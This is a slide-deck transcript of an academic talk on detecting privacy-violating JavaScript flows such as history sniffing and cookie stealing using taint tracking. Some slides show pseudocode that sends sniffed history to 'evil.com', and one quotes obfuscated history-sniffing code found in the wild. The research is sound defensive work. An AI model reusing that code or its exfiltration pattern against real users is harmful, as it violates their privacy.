1 / 58

An Empirical Study of Privacy-Violating Information Flows In JavaScript Web Applications

An Empirical Study of Privacy-Violating Information Flows In JavaScript Web Applications. Dongseok Jang Ranjit Jhala Sorin Lerner Hovav Shacham UC San Diego. ✗. Phishing. Location Hijacking. document.location. ✗. Identity Theft. Cookie Stealing. document.cookie. ✗.

sal
Download Presentation

An Empirical Study of Privacy-Violating Information Flows In JavaScript Web Applications

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. An Empirical Study of Privacy-Violating Information Flows In JavaScript Web Applications Dongseok Jang RanjitJhala Sorin Lerner HovavShacham UC San Diego

  2. • Phishing • Location Hijacking • document.location

  3. • Identity Theft • Cookie Stealing • document.cookie

  4. • History Sniffing JavaScript Visited Not-Visited

  5. See absolutely everything visitors do on your webpage. …

  6. • Behavior Tracking

  7. Plenty of Mischief Possible!

  8. How Prevalent Are Malicious Flows? • How to Detect Malicious Flows?

  9. Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions

  10. Flow Policies • Specify different types of flows

  11. Policies:History Sniffing • 1. Create (invisible) link to a.com color depends on history • 2. Inspect link’s color style property color says if link was visited • 3. Send sniffed info over network

  12. Policies:History Sniffing • link = createLink(“facebook.com”); • style = doc.getStyle(link); • visited = style.color==“purple”; • send(“evil.com”,“facebook=” + visited);

  13. Policies:History Sniffing • link = createLink(“facebook.com”); • style = doc.getStyle(link); • visited = style.color==“purple”; • send(“evil.com”,“facebook=” + visited); doc.getStyle(link); • Inject Taints • (At confidential sources)

  14. Policies:History Sniffing • link = createLink(“facebook.com”); • style = doc.getStyle(link); • visited = style.color==“purple”; • send(“evil.com”,“facebook=” + visited); doc.getStyle(link); style visited style.color==“purple”; style.color==“purple” send(“evil.com”,“facebook=” + visited); • Propagate Taints • (At assignments, etc.)

  15. Policies:History Sniffing • link = createLink(“facebook.com”); • style =doc.getStyle(link); • visited =style.color==“purple”; • send(“evil.com”,“facebook=” + visited); “cr=” + color • send(“evil.com”,“facebook=” + visited); • Block Taints • (At untrusted sinks)

  16. Flow Policies • Inject • Block

  17. Flow Policies • Inject • Block at doc.getStyle($1) ifisLink($1) inject“secret” • Taint style with “secret”

  18. Flow Policies • Inject • Block

  19. Flow Policies • Inject • Block at send($1, $2) block “secret” on $2 • Block tainted values to third-party

  20. Flow Policies • Inject • Block atSite if Cond injectTaint atSite block Taint on Param

  21. Flow Policies • Expressive • History Sniffing • Behavior Tracking • Cookie Stealing • Location Hijacking…

  22. Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions

  23. [Chander et al POPL 07] Dynamic Flow Tracking • Source • code Parse Rewrite Execute • AST • AST Dynamic Eval • Rewrite JS code to carry taints

  24. Source • code Parse Rewrite Execute • AST • AST Dynamic Eval Rewritten Code Add .taintfields Inject, Propagate, Block Taints

  25. Source • code Parse Rewrite Execute • AST • AST Dynamic Eval Rewriting Issues Boxing / Unboxing • Indirect Flows

  26. Source • code Parse Rewrite Execute • AST • AST Dynamic Eval Rewriting Issues Boxing / Unboxing • Indirect Flows

  27. Dynamic Flow Tracking • Source • code Parse Rewrite Execute • AST • AST Dynamic Eval • Rewrite JS code to carry taints • Implemented in Chrome/V8

  28. Dynamic Flow Tracking • Performance (Overhead)

  29. Performance: Policies • Cookie Confidentiality • cookie doesn’t flow to 3rd party code • Location Integrity • locationunaffected by 3rd party code

  30. Performance: Benchmark • 10 sites with the largest JS code base in Alexa top 100 • 15 – 31 Kloc (avg. 21Kloc)

  31. Performance: Figures • Timing Overheads • Page load (avg: 2x) • JS execution (avg: 3x)

  32. Performance: Upshot • High for online use • Acceptable for offline survey

  33. Motivation Flow Policies Dynamic Flow Tracking Flows in the Wild Conclusions

  34. Flows “In the Wild” • History Sniffing • Behavior Tracking

  35. History Sniffing: Figures • Alexa Top 50,000 sites • 63 sites reported as sending history over network • 1 site in Alexa Top 100 • 46 sites were real cases

  36. History Sniffing: Example var k = {0:"qpsoivc/dpn",1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn“...}; var g = []; for (var m in k) { var d = k[m]; var a = ""; for (f=0; f<d.length; f++) a+=String.fromCharCode(d.charCodeAt(f) - 1) var h = false; for (var j in { "http://":"", "http://www.":""}) { var l = document.createElement("a"); l.href = j + a; document.getElementById("ol").appendChild(l); var e = document.getComputedStyle(l).getPropertyValue("color") if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true } } if (h) { g.push(m) } } • Encrypted URLs • Decrypt URL • Create Link • 1 site in Alexa Top 100 • Inspect Color

  37. History Sniffing: Real Cases

  38. History Sniffing: Real Cases

  39. History Sniffing: Real Cases

  40. doubleclick.net History Sniffing: Real Cases charter.net  doubleclick.net interclick

  41. History Sniffing: Real Cases gamestorrentsharrenmedianetworkmeaningtool

  42. History Sniffing: Upshot • # of sniffed URLs: 8 to 222 • 46 of real cases • 39 had third-party sniffing code • 7 had home-grown code • Obfuscated sniffing code • Code was generated at runtime

  43. Malicious Flows “In the Wild” • History Hijacking • Behavior Tracking

  44. Behavior Tracking • Log user behavior by JS event handlers • Send log back to website

  45. Behavior Tracking: Policy while(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ... } onMouseOver = function(event) isMouseOver = true; } true

  46. Behavior Tracking: Policy while(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ... } e.isMouseOver() at $1.isMouseOver() inject“secret” at $1.isClick() inject“secret” …

More Related